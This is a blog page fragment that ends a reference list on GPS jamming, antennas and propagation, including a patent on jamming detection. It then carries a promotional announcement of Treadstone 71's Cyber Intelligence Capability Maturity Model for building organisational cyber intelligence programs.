Berry, R. & Cook, C. (2016) Detection of wireless data jamming and spoofing, US 9466881 B1

 

Blogs

Banggood Blog (9/14/2017) Whats the difference between RHCP and LHCP antennae?     https://blog.banggood.com/rhcp-and-lhcp-whats-the-difference-29046.html

King Blog (9/14/2017) what is the difference between Azimuth and Elevation? https://kingconnect.com/what-is-the-difference-between-azimuth-and-elevation/

Mike Willis Blog (9/13/2017) Propagation. http://www.mike-willis.com/Tutorial/propagation.html

Law and Cyber Warfare Blog. Groll, E. (2017) Investigating if Destroyer Crash was Caused by a Cyber Attack, http://www.jlcw.org/u-s-navy-investigating-if-destroyer-crash-was-caused-by-cyberattack/

Wikipedia

Editor (8/31/2017) GPS Block IIIA, Wikipedia, https://en.wikipedia.org/wiki/GPS_Block_IIIA

Editor (9/14/2017) Circular polarization, Wikipedia, https://en.wikipedia.org/wiki/Circular_polarization

Editor (9/19/2017) Electromagnetic Spectrum, Wikipedia, https://en.wikipedia.org/wiki/Electromagnetic_spectrum

Editor (9/19/2017) Continuous-wave Radar, https://en.wikipedia.org/wiki/Continuous-wave_radar

Treadstone 71 Announces Cyber Intelligence Capability Maturity Model

Treadstone 71 developed a maturity model to help organizations determine the maturity of their cyber intelligence initiatives against the cyber intelligence common body of knowledge (CICBOK). The model provides strategic and operational aspects of your cyber intelligence maturity, where it needs to go, and where you should concentrate your attention to create more value for your business. Nearly 8 years in the making, the Treadstone 71 Cyber Intelligence Maturity Model uses traditional tradecraft as delivered by Sherman Kent and Richards Heuer, intelligence community standards, analytic standards, and experiential knowledge derived from years of training, assessing, and building cyber intelligence programs.

The Treadstone 71 Cyber Intelligence Capability Maturity Model (T71-CICMM) is a methodology used to develop and refine an organization’s cyber intelligence program. Not only is the model educational and practical skills for learning and developing expertise, but also a roadmap for building a cyber intelligence program. More information is available here:

Treadstone 71 Cyber Intelligence Maturity Model

T71CICMM.png

Blog at WordPress.com.

Up ↑

%d bloggers like this: